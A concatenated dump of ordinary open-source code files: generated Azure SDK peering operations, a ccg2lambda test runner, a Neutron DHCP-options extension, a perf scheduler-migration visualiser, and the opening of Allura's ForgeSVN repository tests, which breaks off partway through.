'peeringName': self._serialize.url("peering_name", peering_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'VirtualRouterPeering')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('VirtualRouterPeering', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('VirtualRouterPeering', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}/peerings/{peeringName}'} # type: ignore
def begin_create_or_update(
self,
resource_group_name, # type: str
virtual_router_name, # type: str
peering_name, # type: str
parameters, # type: "_models.VirtualRouterPeering"
**kwargs # type: Any
):
# type: (...) -> LROPoller["_models.VirtualRouterPeering"]
"""Creates or updates the specified Virtual Router Peering.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_router_name: The name of the Virtual Router.
:type virtual_router_name: str
:param peering_name: The name of the Virtual Router Peering.
:type peering_name: str
:param parameters: Parameters supplied to the create or update Virtual Router Peering
operation.
:type parameters: ~azure.mgmt.network.v2020_08_01.models.VirtualRouterPeering
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: Pass in True if you'd like the ARMPolling polling method,
False for no polling, or your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either VirtualRouterPeering or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2020_08_01.models.VirtualRouterPeering]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualRouterPeering"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
virtual_router_name=virtual_router_name,
peering_name=peering_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('VirtualRouterPeering', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
'peeringName': self._serialize.url("peering_name", peering_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}/peerings/{peeringName}'} # type: ignore
def list(
self,
resource_group_name, # type: str
virtual_router_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.VirtualRouterPeeringListResult"]
"""Lists all Virtual Router Peerings in a Virtual Router resource.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_router_name: The name of the Virtual Router.
:type virtual_router_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either VirtualRouterPeeringListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2020_08_01.models.VirtualRouterPeeringListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualRouterPeeringListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-08-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('VirtualRouterPeeringListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.Error, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}/peerings'} # type: ignore
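# A minimal usage sketch of these operations as reached through a management
# client, per the class docstring ("create a Client instance that instantiates
# it for you"). The credential setup, subscription id, and resource names
# below are placeholder assumptions made only for this illustration.
#
#     from azure.identity import DefaultAzureCredential
#     from azure.mgmt.network import NetworkManagementClient
#     from azure.mgmt.network.v2020_08_01.models import VirtualRouterPeering
#
#     client = NetworkManagementClient(DefaultAzureCredential(), '<subscription-id>')
#     poller = client.virtual_router_peerings.begin_create_or_update(
#         resource_group_name='example-rg',
#         virtual_router_name='example-vr',
#         peering_name='example-peering',
#         parameters=VirtualRouterPeering(peer_asn=65000, peer_ip='10.0.0.4'),
#     )
#     peering = poller.result()  # block until the long-running operation finishes
#     for p in client.virtual_router_peerings.list('example-rg', 'example-vr'):
#         print(p.name)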
| mit |
mynlp/ccg2lambda | scripts/run_tests.py | 1 | 3569 | #!/usr/bin/python3
# -*- coding: utf-8 -*-
#
# Copyright 2015 Pascual Martinez-Gomez
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from abduction_tools_test import GetPremisesThatMatchConclusionArgsTestCase
from abduction_tools_test import GetTreePredArgsTestCase
from category_test import CategoryTestCase
from ccg2lambda_tools_test import AssignSemanticsToCCGTestCase
from ccg2lambda_tools_test import AssignSemanticsToCCGWithFeatsTestCase
from ccg2lambda_tools_test import get_attributes_from_ccg_node_recursivelyTestCase
from ccg2lambda_tools_test import TypeRaiseTestCase
from knowledge_test import LexicalRelationsTestCase
from nltk2coq_test import Nltk2coqTestCase
from semantic_index_test import GetSemanticRepresentationTestCase
from semantic_tools_test import resolve_prefix_to_infix_operationsTestCase
from semantic_types_test import ArbiAutoTypesTestCase
from semantic_types_test import build_arbitrary_dynamic_libraryTestCase
from semantic_types_test import build_dynamic_libraryTestCase
from semantic_types_test import Coq2NLTKTypesTestCase
from semantic_types_test import Coq2NLTKSignaturesTestCase
from semantic_types_test import combine_signatures_or_rename_predsTestCase
if __name__ == '__main__':
suite1 = unittest.TestLoader().loadTestsFromTestCase(AssignSemanticsToCCGTestCase)
suite2 = unittest.TestLoader().loadTestsFromTestCase(AssignSemanticsToCCGWithFeatsTestCase)
suite3 = unittest.TestLoader().loadTestsFromTestCase(TypeRaiseTestCase)
suite4 = unittest.TestLoader().loadTestsFromTestCase(build_dynamic_libraryTestCase)
suite5 = unittest.TestLoader().loadTestsFromTestCase(resolve_prefix_to_infix_operationsTestCase)
suite6 = unittest.TestLoader().loadTestsFromTestCase(Nltk2coqTestCase)
suite7 = unittest.TestLoader().loadTestsFromTestCase(build_arbitrary_dynamic_libraryTestCase)
suite8 = unittest.TestLoader().loadTestsFromTestCase(LexicalRelationsTestCase)
suite9 = unittest.TestLoader().loadTestsFromTestCase(Coq2NLTKTypesTestCase)
suite10 = unittest.TestLoader().loadTestsFromTestCase(Coq2NLTKSignaturesTestCase)
suite11 = unittest.TestLoader().loadTestsFromTestCase(ArbiAutoTypesTestCase)
suite12 = unittest.TestLoader().loadTestsFromTestCase(get_attributes_from_ccg_node_recursivelyTestCase)
suite13 = unittest.TestLoader().loadTestsFromTestCase(GetSemanticRepresentationTestCase)
suite14 = unittest.TestLoader().loadTestsFromTestCase(GetTreePredArgsTestCase)
suite15 = unittest.TestLoader().loadTestsFromTestCase(GetPremisesThatMatchConclusionArgsTestCase)
suite16 = unittest.TestLoader().loadTestsFromTestCase(combine_signatures_or_rename_predsTestCase)
suite17 = unittest.TestLoader().loadTestsFromTestCase(CategoryTestCase)
suites = unittest.TestSuite([suite1, suite2, suite3, suite4, suite5, suite6,
suite7, suite8, suite9, suite10, suite11, suite12,
suite13, suite14, suite15, suite16, suite17])
unittest.TextTestRunner(verbosity=2).run(suites)
| apache-2.0 |
apporc/neutron | neutron/extensions/extra_dhcp_opt.py | 5 | 3380 | # Copyright (c) 2013 OpenStack Foundation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from neutron._i18n import _
from neutron.api import extensions
from neutron.api.v2 import attributes as attr
from neutron.common import exceptions
# ExtraDhcpOpts Exceptions
class ExtraDhcpOptNotFound(exceptions.NotFound):
message = _("ExtraDhcpOpt %(id)s could not be found")
class ExtraDhcpOptBadData(exceptions.InvalidInput):
message = _("Invalid data format for extra-dhcp-opt: %(data)s")
# Valid blank extra dhcp opts
VALID_BLANK_EXTRA_DHCP_OPTS = ('router', 'classless-static-route')
# Common definitions for maximum string field length
DHCP_OPT_NAME_MAX_LEN = 64
DHCP_OPT_VALUE_MAX_LEN = 255
EXTRA_DHCP_OPT_KEY_SPECS = {
'id': {'type:uuid': None, 'required': False},
'opt_name': {'type:not_empty_string': DHCP_OPT_NAME_MAX_LEN,
'required': True},
'opt_value': {'type:not_empty_string_or_none': DHCP_OPT_VALUE_MAX_LEN,
'required': True},
'ip_version': {'convert_to': attr.convert_to_int,
'type:values': [4, 6],
'required': False}
}
def _validate_extra_dhcp_opt(data, key_specs=None):
if data is not None:
if not isinstance(data, list):
raise ExtraDhcpOptBadData(data=data)
for d in data:
if d['opt_name'] in VALID_BLANK_EXTRA_DHCP_OPTS:
msg = attr._validate_string_or_none(d['opt_value'],
DHCP_OPT_VALUE_MAX_LEN)
else:
msg = attr._validate_dict(d, key_specs)
if msg:
raise ExtraDhcpOptBadData(data=msg)
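# Illustrative example (not from the original module) of a payload this
# validator accepts, i.e. a list of option dicts such as:
#   [{'opt_name': 'bootfile-name', 'opt_value': 'pxelinux.0', 'ip_version': 4},
#    {'opt_name': 'router', 'opt_value': None}]
# Names listed in VALID_BLANK_EXTRA_DHCP_OPTS only have their value checked;
# all other entries are validated against EXTRA_DHCP_OPT_KEY_SPECS.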
attr.validators['type:list_of_extra_dhcp_opts'] = _validate_extra_dhcp_opt
# Attribute Map
EXTRADHCPOPTS = 'extra_dhcp_opts'
CLIENT_ID = "client-id"
EXTENDED_ATTRIBUTES_2_0 = {
'ports': {
EXTRADHCPOPTS: {
'allow_post': True,
'allow_put': True,
'is_visible': True,
'default': None,
'validate': {
'type:list_of_extra_dhcp_opts': EXTRA_DHCP_OPT_KEY_SPECS
}
}
}
}
class Extra_dhcp_opt(extensions.ExtensionDescriptor):
@classmethod
def get_name(cls):
return "Neutron Extra DHCP opts"
@classmethod
def get_alias(cls):
return "extra_dhcp_opt"
@classmethod
def get_description(cls):
return ("Extra options configuration for DHCP. "
"For example PXE boot options to DHCP clients can "
"be specified (e.g. tftp-server, server-ip-address, "
"bootfile-name)")
@classmethod
def get_updated(cls):
return "2013-03-17T12:00:00-00:00"
def get_extended_resources(self, version):
if version == "2.0":
return EXTENDED_ATTRIBUTES_2_0
else:
return {}
| apache-2.0 |
lucaspcamargo/litmus-rt | tools/perf/scripts/python/sched-migration.py | 1910 | 11965 | #!/usr/bin/python
#
# Cpu task migration overview toy
#
# Copyright (C) 2010 Frederic Weisbecker <[email protected]>
#
# perf script event handlers have been generated by perf script -g python
#
# This software is distributed under the terms of the GNU General
# Public License ("GPL") version 2 as published by the Free Software
# Foundation.
import os
import sys
from collections import defaultdict
from UserList import UserList
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
sys.path.append('scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
from SchedGui import *
threads = { 0 : "idle"}
def thread_name(pid):
return "%s:%d" % (threads[pid], pid)
class RunqueueEventUnknown:
@staticmethod
def color():
return None
def __repr__(self):
return "unknown"
class RunqueueEventSleep:
@staticmethod
def color():
return (0, 0, 0xff)
def __init__(self, sleeper):
self.sleeper = sleeper
def __repr__(self):
return "%s gone to sleep" % thread_name(self.sleeper)
class RunqueueEventWakeup:
@staticmethod
def color():
return (0xff, 0xff, 0)
def __init__(self, wakee):
self.wakee = wakee
def __repr__(self):
return "%s woke up" % thread_name(self.wakee)
class RunqueueEventFork:
@staticmethod
def color():
return (0, 0xff, 0)
def __init__(self, child):
self.child = child
def __repr__(self):
return "new forked task %s" % thread_name(self.child)
class RunqueueMigrateIn:
@staticmethod
def color():
return (0, 0xf0, 0xff)
def __init__(self, new):
self.new = new
def __repr__(self):
return "task migrated in %s" % thread_name(self.new)
class RunqueueMigrateOut:
@staticmethod
def color():
return (0xff, 0, 0xff)
def __init__(self, old):
self.old = old
def __repr__(self):
return "task migrated out %s" % thread_name(self.old)
class RunqueueSnapshot:
def __init__(self, tasks = [0], event = RunqueueEventUnknown()):
self.tasks = tuple(tasks)
self.event = event
def sched_switch(self, prev, prev_state, next):
event = RunqueueEventUnknown()
if taskState(prev_state) == "R" and next in self.tasks \
and prev in self.tasks:
return self
if taskState(prev_state) != "R":
event = RunqueueEventSleep(prev)
next_tasks = list(self.tasks[:])
if prev in self.tasks:
if taskState(prev_state) != "R":
next_tasks.remove(prev)
elif taskState(prev_state) == "R":
next_tasks.append(prev)
if next not in next_tasks:
next_tasks.append(next)
return RunqueueSnapshot(next_tasks, event)
def migrate_out(self, old):
if old not in self.tasks:
return self
next_tasks = [task for task in self.tasks if task != old]
return RunqueueSnapshot(next_tasks, RunqueueMigrateOut(old))
def __migrate_in(self, new, event):
if new in self.tasks:
self.event = event
return self
next_tasks = self.tasks[:] + tuple([new])
return RunqueueSnapshot(next_tasks, event)
def migrate_in(self, new):
return self.__migrate_in(new, RunqueueMigrateIn(new))
def wake_up(self, new):
return self.__migrate_in(new, RunqueueEventWakeup(new))
def wake_up_new(self, new):
return self.__migrate_in(new, RunqueueEventFork(new))
def load(self):
""" Provide the number of tasks on the runqueue.
Don't count idle"""
return len(self.tasks) - 1
def __repr__(self):
ret = self.tasks.__repr__()
ret += self.origin_tostring()
return ret
class TimeSlice:
def __init__(self, start, prev):
self.start = start
self.prev = prev
self.end = start
# cpus that triggered the event
self.event_cpus = []
if prev is not None:
self.total_load = prev.total_load
self.rqs = prev.rqs.copy()
else:
self.rqs = defaultdict(RunqueueSnapshot)
self.total_load = 0
def __update_total_load(self, old_rq, new_rq):
diff = new_rq.load() - old_rq.load()
self.total_load += diff
def sched_switch(self, ts_list, prev, prev_state, next, cpu):
old_rq = self.prev.rqs[cpu]
new_rq = old_rq.sched_switch(prev, prev_state, next)
if old_rq is new_rq:
return
self.rqs[cpu] = new_rq
self.__update_total_load(old_rq, new_rq)
ts_list.append(self)
self.event_cpus = [cpu]
def migrate(self, ts_list, new, old_cpu, new_cpu):
if old_cpu == new_cpu:
return
old_rq = self.prev.rqs[old_cpu]
out_rq = old_rq.migrate_out(new)
self.rqs[old_cpu] = out_rq
self.__update_total_load(old_rq, out_rq)
new_rq = self.prev.rqs[new_cpu]
in_rq = new_rq.migrate_in(new)
self.rqs[new_cpu] = in_rq
self.__update_total_load(new_rq, in_rq)
ts_list.append(self)
if old_rq is not out_rq:
self.event_cpus.append(old_cpu)
self.event_cpus.append(new_cpu)
def wake_up(self, ts_list, pid, cpu, fork):
old_rq = self.prev.rqs[cpu]
if fork:
new_rq = old_rq.wake_up_new(pid)
else:
new_rq = old_rq.wake_up(pid)
if new_rq is old_rq:
return
self.rqs[cpu] = new_rq
self.__update_total_load(old_rq, new_rq)
ts_list.append(self)
self.event_cpus = [cpu]
def next(self, t):
self.end = t
return TimeSlice(t, self)
class TimeSliceList(UserList):
def __init__(self, arg = []):
self.data = arg
def get_time_slice(self, ts):
if len(self.data) == 0:
slice = TimeSlice(ts, TimeSlice(-1, None))
else:
slice = self.data[-1].next(ts)
return slice
def find_time_slice(self, ts):
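        # Binary search over the ordered time slices: returns the index of the
        # slice whose [start, end] interval contains ts, or -1 if none does.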
start = 0
end = len(self.data)
found = -1
searching = True
while searching:
if start == end or start == end - 1:
searching = False
i = (end + start) / 2
if self.data[i].start <= ts and self.data[i].end >= ts:
found = i
end = i
continue
if self.data[i].end < ts:
start = i
elif self.data[i].start > ts:
end = i
return found
def set_root_win(self, win):
self.root_win = win
def mouse_down(self, cpu, t):
idx = self.find_time_slice(t)
if idx == -1:
return
ts = self[idx]
rq = ts.rqs[cpu]
raw = "CPU: %d\n" % cpu
raw += "Last event : %s\n" % rq.event.__repr__()
raw += "Timestamp : %d.%06d\n" % (ts.start / (10 ** 9), (ts.start % (10 ** 9)) / 1000)
raw += "Duration : %6d us\n" % ((ts.end - ts.start) / (10 ** 6))
raw += "Load = %d\n" % rq.load()
for t in rq.tasks:
raw += "%s \n" % thread_name(t)
self.root_win.update_summary(raw)
def update_rectangle_cpu(self, slice, cpu):
rq = slice.rqs[cpu]
if slice.total_load != 0:
load_rate = rq.load() / float(slice.total_load)
else:
load_rate = 0
red_power = int(0xff - (0xff * load_rate))
color = (0xff, red_power, red_power)
top_color = None
if cpu in slice.event_cpus:
top_color = rq.event.color()
self.root_win.paint_rectangle_zone(cpu, color, top_color, slice.start, slice.end)
def fill_zone(self, start, end):
i = self.find_time_slice(start)
if i == -1:
return
for i in xrange(i, len(self.data)):
timeslice = self.data[i]
if timeslice.start > end:
return
for cpu in timeslice.rqs:
self.update_rectangle_cpu(timeslice, cpu)
def interval(self):
if len(self.data) == 0:
return (0, 0)
return (self.data[0].start, self.data[-1].end)
def nr_rectangles(self):
last_ts = self.data[-1]
max_cpu = 0
for cpu in last_ts.rqs:
if cpu > max_cpu:
max_cpu = cpu
return max_cpu
class SchedEventProxy:
def __init__(self):
self.current_tsk = defaultdict(lambda : -1)
self.timeslices = TimeSliceList()
def sched_switch(self, headers, prev_comm, prev_pid, prev_prio, prev_state,
next_comm, next_pid, next_prio):
""" Ensure the task we sched out this cpu is really the one
we logged. Otherwise we may have missed traces """
on_cpu_task = self.current_tsk[headers.cpu]
if on_cpu_task != -1 and on_cpu_task != prev_pid:
print "Sched switch event rejected ts: %s cpu: %d prev: %s(%d) next: %s(%d)" % \
(headers.ts_format(), headers.cpu, prev_comm, prev_pid, next_comm, next_pid)
threads[prev_pid] = prev_comm
threads[next_pid] = next_comm
self.current_tsk[headers.cpu] = next_pid
ts = self.timeslices.get_time_slice(headers.ts())
ts.sched_switch(self.timeslices, prev_pid, prev_state, next_pid, headers.cpu)
def migrate(self, headers, pid, prio, orig_cpu, dest_cpu):
ts = self.timeslices.get_time_slice(headers.ts())
ts.migrate(self.timeslices, pid, orig_cpu, dest_cpu)
def wake_up(self, headers, comm, pid, success, target_cpu, fork):
if success == 0:
return
ts = self.timeslices.get_time_slice(headers.ts())
ts.wake_up(self.timeslices, pid, target_cpu, fork)
def trace_begin():
global parser
parser = SchedEventProxy()
def trace_end():
app = wx.App(False)
timeslices = parser.timeslices
frame = RootFrame(timeslices, "Migration")
app.MainLoop()
def sched__sched_stat_runtime(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
common_callchain, comm, pid, runtime, vruntime):
pass
def sched__sched_stat_iowait(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
common_callchain, comm, pid, delay):
pass
def sched__sched_stat_sleep(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
common_callchain, comm, pid, delay):
pass
def sched__sched_stat_wait(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
common_callchain, comm, pid, delay):
pass
def sched__sched_process_fork(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
common_callchain, parent_comm, parent_pid, child_comm, child_pid):
pass
def sched__sched_process_wait(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
common_callchain, comm, pid, prio):
pass
def sched__sched_process_exit(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
common_callchain, comm, pid, prio):
pass
def sched__sched_process_free(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
common_callchain, comm, pid, prio):
pass
def sched__sched_migrate_task(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
common_callchain, comm, pid, prio, orig_cpu,
dest_cpu):
headers = EventHeaders(common_cpu, common_secs, common_nsecs,
common_pid, common_comm, common_callchain)
parser.migrate(headers, pid, prio, orig_cpu, dest_cpu)
def sched__sched_switch(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm, common_callchain,
prev_comm, prev_pid, prev_prio, prev_state,
next_comm, next_pid, next_prio):
headers = EventHeaders(common_cpu, common_secs, common_nsecs,
common_pid, common_comm, common_callchain)
parser.sched_switch(headers, prev_comm, prev_pid, prev_prio, prev_state,
next_comm, next_pid, next_prio)
def sched__sched_wakeup_new(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
common_callchain, comm, pid, prio, success,
target_cpu):
headers = EventHeaders(common_cpu, common_secs, common_nsecs,
common_pid, common_comm, common_callchain)
parser.wake_up(headers, comm, pid, success, target_cpu, 1)
def sched__sched_wakeup(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
common_callchain, comm, pid, prio, success,
target_cpu):
headers = EventHeaders(common_cpu, common_secs, common_nsecs,
common_pid, common_comm, common_callchain)
parser.wake_up(headers, comm, pid, success, target_cpu, 0)
def sched__sched_wait_task(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
common_callchain, comm, pid, prio):
pass
def sched__sched_kthread_stop_ret(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
common_callchain, ret):
pass
def sched__sched_kthread_stop(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
common_callchain, comm, pid):
pass
def trace_unhandled(event_name, context, event_fields_dict):
pass
| gpl-2.0 |
apache/incubator-allura | ForgeSVN/forgesvn/tests/model/test_repository.py | 1 | 44587 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
import shutil
import unittest
import pkg_resources
from itertools import count, product
from datetime import datetime
from zipfile import ZipFile
from collections import defaultdict
from pylons import tmpl_context as c, app_globals as g
import mock
from nose.tools import assert_equal
import tg
import ming
from ming.base import Object
from ming.orm import session, ThreadLocalORMSession
from testfixtures import TempDirectory
from IPython.testing.decorators import onlyif
from alluratest.controller import setup_basic_test, setup_global_objects
from allura import model as M
from allura.model.repo_refresh import send_notifications
from allura.lib import helpers as h
from allura.tests.model.test_repo import RepoImplTestBase
from forgesvn import model as SM
from forgesvn.model.svn import svn_path_exists
from forgesvn.tests import with_svn
from allura.tests.decorators import with_tool
class TestNewRepo(unittest.TestCase):
def setUp(self):
setup_basic_test()
self.setup_with_tools()
@with_svn
def setup_with_tools(self):
setup_global_objects()
h.set_context('test', 'src', neighborhood='Projects')
repo_dir = pkg_resources.resource_filename(
'forgesvn', 'tests/data/')
self.repo = SM.Repository(
name='testsvn',
fs_path=repo_dir,
url_path='/test/',
tool='svn',
status='creating')
self.repo.refresh()
self.rev = self.repo.commit('HEAD')
ThreadLocalORMSession.flush_all()
ThreadLocalORMSession.close_all()
def test_last_commit_for(self):
tree = self.rev.tree
for row in tree.ls():
assert row['last_commit']['author'] is not None
def test_commit(self):
assert self.rev.primary() is self.rev
assert self.rev.index_id().startswith('allura/model/repo/Commit#')
self.rev.author_url
self.rev.committer_url
assert self.rev.tree._id == self.rev.tree_id
assert self.rev.shorthand_id() == '[r6]'
assert self.rev.symbolic_ids == ([], [])
assert self.rev.url() == (
'/p/test/src/6/')
all_cis = list(self.repo.log(self.rev._id))
assert len(all_cis) == 6
self.rev.tree.ls()
assert self.rev.tree.readme() == (
'README', 'This is readme\nAnother Line\n')
assert self.rev.tree.path() == '/'
assert self.rev.tree.url() == (
'/p/test/src/6/tree/')
self.rev.tree.by_name['README']
assert self.rev.tree.is_blob('README') == True
assert self.rev.tree['a']['b']['c'].ls() == []
self.assertRaises(KeyError, lambda: self.rev.tree['a']['b']['d'])
class TestSVNRepo(unittest.TestCase, RepoImplTestBase):
def setUp(self):
setup_basic_test()
self.setup_with_tools()
@with_svn
@with_tool('test', 'SVN', 'svn-tags', 'SVN with tags')
def setup_with_tools(self):
setup_global_objects()
h.set_context('test', 'src', neighborhood='Projects')
repo_dir = pkg_resources.resource_filename(
'forgesvn', 'tests/data/')
self.repo = SM.Repository(
name='testsvn',
fs_path=repo_dir,
url_path='/test/',
tool='svn',
status='creating')
self.repo.refresh()
self.svn_tags = SM.Repository(
name='testsvn-trunk-tags-branches',
fs_path=repo_dir,
url_path='/test/',
tool='svn',
status='creating')
self.svn_tags.refresh()
ThreadLocalORMSession.flush_all()
ThreadLocalORMSession.close_all()
def test_init(self):
repo = SM.Repository(
name='testsvn',
fs_path=g.tmpdir + '/',
url_path='/test/',
tool='svn',
status='creating')
dirname = os.path.join(repo.fs_path, repo.name)
if os.path.exists(dirname):
shutil.rmtree(dirname)
repo.init()
shutil.rmtree(dirname)
def test_fork(self):
repo = SM.Repository(
name='testsvn',
fs_path=g.tmpdir + '/',
url_path='/test/',
tool='svn',
status='creating')
repo_path = pkg_resources.resource_filename(
'forgesvn', 'tests/data/testsvn')
dirname = os.path.join(repo.fs_path, repo.name)
if os.path.exists(dirname):
shutil.rmtree(dirname)
repo.init()
repo._impl.clone_from('file://' + repo_path)
assert not os.path.exists(
os.path.join(g.tmpdir, 'testsvn/hooks/pre-revprop-change'))
assert os.path.exists(
os.path.join(g.tmpdir, 'testsvn/hooks/post-commit'))
assert os.access(
os.path.join(g.tmpdir, 'testsvn/hooks/post-commit'), os.X_OK)
with open(os.path.join(g.tmpdir, 'testsvn/hooks/post-commit')) as f:
hook_data = f.read()
self.assertIn(
'curl -s http://localhost/auth/refresh_repo/p/test/src/\n',
hook_data)
self.assertIn('exec $DIR/post-commit-user "$@"\n', hook_data)
repo.refresh(notify=False)
assert len(list(repo.log()))
shutil.rmtree(dirname)
@mock.patch('forgesvn.model.svn.tg')
def test_can_hotcopy(self, tg):
from forgesvn.model.svn import SVNImplementation
func = SVNImplementation.can_hotcopy
obj = mock.Mock(spec=SVNImplementation)
for combo in product(
['file:///myfile', 'http://myfile'],
[True, False],
['version 1.7', 'version 1.6', 'version 2.0.3']):
source_url = combo[0]
tg.config = {'scm.svn.hotcopy': combo[1]}
stdout = combo[2]
obj.check_call.return_value = stdout, ''
expected = (source_url.startswith('file://') and
